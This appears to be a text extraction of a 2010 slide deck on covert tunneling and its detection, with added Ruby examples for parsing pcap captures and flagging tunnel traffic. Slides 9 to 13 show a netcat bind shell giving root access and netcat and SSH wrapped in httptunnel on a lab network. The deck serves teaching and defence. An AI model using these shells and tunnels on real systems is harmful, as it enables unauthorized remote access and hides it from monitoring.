8/13/2019 Ccue Janicki Richard
1/30
COVERT TUNNELING
Uses and Detection
Rich Janicki
-
2/30
WHAT IS COVERT TUNNELING?
Today covert tunnels are defined as those that use entities not normally viewed as data objects, but that can be manipulated maliciously to transfer information from one subject to another [2].
Some protocols that can be used are HTTP, ICMP, DNS, and SSH, to name a few.
Steganography can be used to conceal data in image files such as JPEG.
-
3/30
WHY IS COVERT TUNNELING IMPORTANT?
As a Network Administrator, one could use covert tunneling for good:
It can provide a safe way to maintain servers
It can hide sensitive data from prying eyes
It allows one to test network equipment designed to prevent the usage of these techniques
Hackers can use tunneling to hide their tracks
Malware can use tunneling to receive updates and commands, as well as hide activities
-
4/30
HACKERS USE COVERT TUNNELING?
As stated earlier, malware programs can use tunneling to send and receive commands
Botnets thrive on the ability to use tunneling
The combination of these techniques allows the botnet operator to remain hidden while controlling many computers
Trojans/backdoors use common tools, or variations of these tools, to allow remote access to a compromised system
Knowing how these tools operate is key to defending against them
-
5/30
DEMONSTRATION OF COVERT TUNNELING
-
6/30
NETCAT
The Swiss Army Knife of TCP/IP
Many uses including backdoors, port scanning, port listening, simple file sharing, and simple chat
Integrates well with covert tunneling
Implements easily into programs and scripting
-
7/30
NETCAT ON TARGET
****Netcat****
root@bt:~# nc -lp 8000
hello
hi
this is a basic netcat conversation
ok
goodbye
see you later
-
8/30
NETCAT ON ATTACKER
****Netcat Chat****
rich@netbookremix:~$ nc 192.168.1.121 8000
hello
hi
this is a basic netcat conversation
ok
goodbye
see you later
^C
-
9/30
NETCAT SHELL ON TARGET
****Netcat Shell****
root@bt:~# nc -lp 8000 -e /bin/sh
-
10/30
NETCAT SHELL ON ATTACKER
****Netcat Shell****
rich@netbookremix:~$ nc 192.168.1.121 8000
whoami
root
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:76:32:56:61
          inet addr:192.168.1.121  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:27 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2452 (2.4 KB)  TX bytes:1855 (1.8 KB)
          Interrupt:23 Base address:0xcc00

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
-
11/30
HTTPTUNNEL
****Netcat over Httptunnel (Target)****
root@bt:~# hts -F localhost:8000 80
root@bt:~# nc -lp 8000
****Netcat over Httptunnel (Attacker)****
rich@netbookremix:~$ htc -F 10001 192.168.1.121:80
rich@netbookremix:~$ nc 127.0.0.1 10001
-
12/30
SSH
****Normal SSH****
rich@netbookremix:~$ ssh [email protected]
[email protected]'s password:
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
Last login: Thu Mar 18 21:57:43 2010
root@bt:~# whoami
root
-
13/30
SSH OVER HTTPTUNNEL
****SSH over Httptunnel (Target)****
root@bt:~# hts -F localhost:22 8081
****SSH over Httptunnel (Attacker)****
rich@netbookremix:~$ htc -F 10003 192.168.1.121:8081
rich@netbookremix:~$ ssh [email protected] -p 10003
The authenticity of host '[127.0.0.1]:10003 ([127.0.0.1]:10003)' can't be established.
RSA key fingerprint is 62:fb:a9:b3:67:f0:6d:c8:58:f1:1a:01:2c:21:89:73.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:10003' (RSA) to the list of known hosts.
[email protected]'s password:
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
Last login: Thu Mar 18 22:06:26 2010 from 192.168.1.115
root@bt:~# whoami
root
-
14/30
CRYPTCAT
****Cryptcat****
root@bt:~# cryptcat -lp 9000
hello
hi
this conversation is a basic cryptcat conversation
that means its encrypted right?
yes sir
goodbye
see you later
-
15/30
-
16/30
TOOLS TO DEFEND AGAINST COVERT TUNNELING
Web Tap (commercial product)
Open source firewalls such as IPCop or Smoothwall
Wireshark, Network Miner, or NetWitness
Snort Intrusion Detection System (IDS)
-
17/30
FIREWALL RULES
Prevent unwanted traffic
Close and stop unnecessary ports and services
Prevent ACK tunneling by examining the way a connection is initialized
Set connection timeouts
Enable content filtering
Use Intrusion Detection Systems
Use proxies with authentication
Don't allow HTTP CONNECT queries
Use anti-virus and anti-malware programs
Inspect log files regularly, monitor traffic, and build statistics of both [10]
-
18/30
-
19/30
WIRESHARK
-
20/30
WIRESHARK
-
21/30
WIRESHARK
-
22/30
PCAPDUMP.RB
Programmed in Ruby
Uses the Ruby pcap and pcaplet libraries
Command line tool to ease viewing pcap files
To be used on already captured pcap files
User can see plain text information being sent over the network faster
Tool I created to learn more about pcap files and to help understand network protocols
rich@netbookremix:~/presentation$ ruby pcapdump.rb -r alltestshub.pcap
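The slide describes pcapdump.rb but does not show its source. The following is an added example, not the presentation's own tool: a minimal pcap reader written in plain Ruby with no dependency on the ruby-pcap or pcaplet gems. It walks the libpcap global header and record headers, decodes Ethernet, IPv4 and TCP, and prints payloads in the same "timestamp src:port > dst:port flags / DATA--->" shape the later slides show. The sample capture it builds in memory is constructed here; the addresses, ports and flag string are taken from the slides, the timestamps are made up.

```ruby
# Added example, not the presentation's pcapdump.rb: a minimal libpcap file
# reader in plain Ruby (no ruby-pcap / pcaplet gems). It walks the global
# header, each record header, then Ethernet -> IPv4 -> TCP, and prints
# payloads in the "ts src:port > dst:port flags / DATA---> ..." shape the
# slides show. Only little-endian pcap with Ethernet frames is handled.

PCAP_MAGIC_LE     = 0xa1b2c3d4
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4    = 0x0800
IPPROTO_TCP       = 6

# tcpdump-style flag letters in the order U A P R S F, '.' when unset.
def tcp_flag_string(flags)
  [[0x20, 'U'], [0x10, 'A'], [0x08, 'P'], [0x04, 'R'], [0x02, 'S'], [0x01, 'F']]
    .map { |bit, ch| flags & bit != 0 ? ch : '.' }.join
end

# Ethernet -> IPv4 -> TCP. Returns nil for frames that are not IPv4/TCP.
def parse_ethernet_frame(frame)
  return nil if frame.bytesize < 14 + 20 + 20
  return nil unless frame.byteslice(12, 2).unpack('n')[0] == ETHERTYPE_IPV4
  ip = frame.byteslice(14, frame.bytesize - 14)
  ihl = (ip.getbyte(0) & 0x0f) * 4            # IPv4 header length in bytes
  total_len = ip.byteslice(2, 2).unpack('n')[0]
  return nil unless ip.getbyte(9) == IPPROTO_TCP
  tcp = ip.byteslice(ihl, total_len - ihl)
  sport, dport = tcp.byteslice(0, 4).unpack('nn')
  data_off = (tcp.getbyte(12) >> 4) * 4       # TCP header length in bytes
  {
    src: ip.byteslice(12, 4).unpack('C4').join('.'), sport: sport,
    dst: ip.byteslice(16, 4).unpack('C4').join('.'), dport: dport,
    flags: tcp.getbyte(13),
    payload: tcp.byteslice(data_off, tcp.bytesize - data_off)
  }
end

# Parses a whole pcap file held in memory into an array of TCP records.
def parse_pcap(bytes)
  bytes = bytes.b
  magic, _vmaj, _vmin, _tz, _sigfigs, _snaplen, linktype =
    bytes.byteslice(0, 24).unpack('L<S<S<l<L<L<L<')
  raise 'not a little-endian pcap file' unless magic == PCAP_MAGIC_LE
  raise 'only LINKTYPE_ETHERNET captures are supported' unless linktype == LINKTYPE_ETHERNET
  records = []
  off = 24
  while off + 16 <= bytes.bytesize
    ts_sec, ts_usec, incl_len, _orig_len = bytes.byteslice(off, 16).unpack('L<L<L<L<')
    off += 16
    rec = parse_ethernet_frame(bytes.byteslice(off, incl_len))
    off += incl_len
    next if rec.nil?
    rec[:ts] = Time.at(ts_sec, ts_usec)
    records << rec
  end
  records
end

# Renders one record; non-printable payload bytes (for example SSH or
# cryptcat ciphertext) are shown as '.' instead of raw control characters.
def format_record(rec)
  printable = rec[:payload].bytes.map { |b| b == 10 || (32..126).cover?(b) ? b.chr : '.' }.join
  "#{rec[:ts].strftime('%H:%M:%S.%6N')} #{rec[:src]}:#{rec[:sport]} > " \
    "#{rec[:dst]}:#{rec[:dport]} #{tcp_flag_string(rec[:flags])}\nDATA---> #{printable}"
end

# --- constructed sample capture (not the presentation's pcap file) ---------
def build_tcp_frame(src, sport, dst, dport, flags, payload)
  tcp = [sport, dport, 1, 1, 0x50, flags, 65_535, 0, 0].pack('nnNNCCnnn') + payload.b
  ip  = [0x45, 0, 20 + tcp.bytesize, 0, 0, 64, IPPROTO_TCP, 0].pack('CCnnnCCn') +
        src.split('.').map(&:to_i).pack('C4') + dst.split('.').map(&:to_i).pack('C4')
  eth = ("\x00\x0c\x76\x32\x56\x61" + "\x00\x11\x22\x33\x44\x55").b + [ETHERTYPE_IPV4].pack('n')
  eth + ip + tcp
end

def build_sample_pcap
  header = [PCAP_MAGIC_LE, 2, 4, 0, 0, 65_535, LINKTYPE_ETHERNET].pack('L<S<S<l<L<L<L<')
  frames = [  # made-up timestamps; 0x18 = PSH|ACK, shown as ".AP..."
    [1_268_967_690, 842_629, build_tcp_frame('192.168.1.115', 34_828, '192.168.1.121', 8000, 0x18, 'hello')],
    [1_268_967_697, 310_009, build_tcp_frame('192.168.1.121', 8000, '192.168.1.115', 34_828, 0x18, 'hi')]
  ]
  frames.inject(header) do |acc, (sec, usec, frame)|
    acc + [sec, usec, frame.bytesize, frame.bytesize].pack('L<L<L<L<') + frame
  end
end

if __FILE__ == $PROGRAM_NAME
  data = ARGV[0] ? File.binread(ARGV[0]) : build_sample_pcap
  parse_pcap(data).each { |rec| puts format_record(rec); puts '-' * 63 }
end
```

Run it with a capture path (`ruby pcapparse.rb alltestshub.pcap`) to dump a real file, or with no argument to print the two constructed packets. The printable-byte filter is what makes the SSH and cryptcat slides readable at a glance: anything that renders as a run of dots is payload the tool cannot interpret, which is exactly the signal a reviewer is looking for when deciding whether a session is cleartext.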
-
23/30
PCAPDUMP.RB
****************pcapdump by Rich Janicki********************
23:01:30.842629 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> hello
---------------------------------------------------------------
23:01:37.310009 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> hi
---------------------------------------------------------------
23:01:48.922890 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> this is a basic netcat conversation
---------------------------------------------------------------
23:01:55.845469 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> ok
---------------------------------------------------------------
23:01:59.603798 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> goodbye
---------------------------------------------------------------
23:02:06.518693 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> see you later
-
24/30
PCAPDUMP.RB
---------------------------------------------------------------
23:02:49.115744 192.168.1.115:34829 > 192.168.1.121:8000 .AP...
DATA---> ifconfig
---------------------------------------------------------------
23:02:49.117790 192.168.1.121:8000 > 192.168.1.115:34829 .AP...
DATA---> eth0      Link encap:Ethernet  HWaddr 00:0c:76:32:56:61
          inet addr:192.168.1.121  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:27 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2452 (2.4 KB)  TX bytes:1855 (1.8 KB)
          Interrupt:23 Base address:0xcc00
-
25/30
PCAPDUMP CATCHING HTTPTUNNEL
---------------------------------------------------------------
23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...
DATA---> GET /index.html?crap=1268967869 HTTP/1.1
---------------------------------------------------------------
23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...
DATA---> Host: 192.168.1.121:80
Connection: close
---------------------------------------------------------------
23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...
DATA---> HTTP/1.1 200 OK
Content-Length: 102400
Connection: close
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Content-Type: text/html
-
26/30
PCAPDUMP CATCHING HTTPTUNNEL
---------------------------------------------------------------
23:04:35.657512 192.168.1.115:56255 > 192.168.1.121:80 .AP...
DATA--->
---------------------------------------------------------------
23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80 .AP...
DATA---> hello
---------------------------------------------------------------
23:04:38.660736 192.168.1.121:80 > 192.168.1.115:56256 .AP...
DATA---> E
---------------------------------------------------------------
Content-Type: text/html
-
27/30
CATCHING SSH
---------------------------------------------------------------
23:06:28.404301 192.168.1.121:22 > 192.168.1.115:54506 .AP...
DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
---------------------------------------------------------------
23:06:28.410369 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
---------------------------------------------------------------
23:06:28.410858 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> ^wx?0JJf{~
diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
ssh-rsa,ssh-dss
aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctr
aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctr
hmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96
hmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96
none,[email protected],zlib
none,[email protected],zlib
---------------------------------------------------------------
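The httptunnel and SSH captures above share a pattern a defender can key on: on the httptunnel connection the client sends bare data ("hello") to port 80 with no HTTP request line in front of it, and an SSH session announces itself with a cleartext "SSH-2.0-" banner whatever port it is wrapped in. The block below is an added example, not part of the presentation: it parses pcapdump-style text output and applies those two heuristics. The sample records are constructed to mirror the slides; the list of ports treated as HTTP and the per-flow "first payload" rule are assumptions.

```ruby
# Added example, not the presentation's code: two heuristics run over
# pcapdump-style text (the "ts src:port > dst:port flags" / "DATA---> ..."
# format shown on the slides).
#   1. the first payload a client sends to an HTTP port does not start like
#      an HTTP request (raw data riding an HTTP port, as in the httptunnel
#      capture), and
#   2. an SSH version banner seen on any port other than 22.
# Both are indicators worth investigating, not proof of a tunnel.

HEADER_RE     = /\A(\d{2}:\d{2}:\d{2}\.\d+) (\d+(?:\.\d+){3}):(\d+) > (\d+(?:\.\d+){3}):(\d+) (\S+)\z/
HTTP_START_RE = %r{\A(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|CONNECT|HTTP/1\.[01]) }
HTTP_PORTS    = [80, 8080, 8081].freeze   # assumption: ports expected to carry HTTP framing

# Parses pcapdump text into [{ts:, src:, sport:, dst:, dport:, flags:, data:}, ...].
# A record's data may span several lines; a dashed rule ends the record.
def parse_pcapdump(text)
  records = []
  current = nil
  text.each_line do |raw|
    line = raw.chomp
    if (m = HEADER_RE.match(line))
      current = { ts: m[1], src: m[2], sport: m[3].to_i, dst: m[4], dport: m[5].to_i,
                  flags: m[6], data: String.new }
      records << current
    elsif line.start_with?('-----')
      current = nil
    elsif current && line.start_with?('DATA--->')
      current[:data] << line.sub(/\ADATA---> ?/, '')
    elsif current
      current[:data] << "\n" << line
    end
  end
  records
end

# Returns one human-readable finding per suspicious record.
def suspicious_records(records)
  findings = []
  first_seen = {}   # 4-tuple => true once a non-empty payload has been judged
  records.each do |r|
    data = r[:data]
    next if data.empty?
    key = [r[:src], r[:sport], r[:dst], r[:dport]]
    first_in_flow = !first_seen.key?(key)
    first_seen[key] = true
    where = "#{r[:ts]} #{r[:src]}:#{r[:sport]} -> #{r[:dst]}:#{r[:dport]}"
    first_line = data.lines.first.strip.inspect
    # Only the first segment of a flow is judged, so a "Host:" header that
    # arrives in its own segment is not mistaken for raw tunnel data.
    if first_in_flow && HTTP_PORTS.include?(r[:dport]) && !data.match?(HTTP_START_RE)
      findings << "#{where}: non-HTTP payload on an HTTP port (possible HTTP tunnel): #{first_line}"
    end
    if data.start_with?('SSH-') && r[:sport] != 22 && r[:dport] != 22
      findings << "#{where}: SSH banner on a non-SSH port: #{first_line}"
    end
  end
  findings
end

# Constructed sample modelled on the slides' output (not the original capture).
SAMPLE_DUMP = <<~DUMP
  23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...
  DATA---> GET /index.html?crap=1268967869 HTTP/1.1
  ---------------------------------------------------------------
  23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...
  DATA---> Host: 192.168.1.121:80
  Connection: close
  ---------------------------------------------------------------
  23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...
  DATA---> HTTP/1.1 200 OK
  Content-Length: 102400
  Connection: close
  ---------------------------------------------------------------
  23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80 .AP...
  DATA---> hello
  ---------------------------------------------------------------
  23:06:28.404301 192.168.1.121:8081 > 192.168.1.115:54506 .AP...
  DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
  ---------------------------------------------------------------
DUMP

if __FILE__ == $PROGRAM_NAME
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_DUMP
  suspicious_records(parse_pcapdump(text)).each { |f| puts f }
end
```

Feed it a saved pcapdump text file as the first argument, or run it bare to see the two constructed findings. Both checks work on individual segments rather than a reassembled stream, so a real deployment would reassemble per connection first; and neither check sees anything once the tunnel is wrapped in TLS, which is why the firewall slide's proxy and connection-timeout advice matters alongside inspection.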
-
28/30
EXAMPLE SSH PACKET
23:06:28.411906 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> "
---------------------------------------------------------------
23:06:28.423842 192.168.1.121:22 > 192.168.1.115:54506 .AP...
DATA---> IiL7+ec~x^+
'+"d{ w3-
SX]vj6&Fb?J`[G&Q
sUceL
Be rA('\
---------------------------------------------------------------
-
29/30
EXAMPLE CRYPTCAT PACKET
---------------------------------------------------------------
23:12:36.584469 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
DATA---> QJmQk,N
---------------------------------------------------------------
23:12:36.584479 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
DATA---> 192.168.1.115:57305 .AP...
DATA--->
>9M
---------------------------------------------------------------
23:12:43.066825 192.168.1.121:9000 > 192.168.1.115:57305 .AP...
DATA---> 3f_8=M
---------------------------------------------------------------
-
30/30
CONCLUSION
Some things to think about
These tests were performed on a local network
They can be expanded to simulate an attack on a large network
Pcap files can get very large, very quickly
Don't run Wireshark for extended periods of time
All of the tests were captured in about 15 minutes using one pcap file
Using pcapdump to save the output to a text file (in this case) creates a fairly large file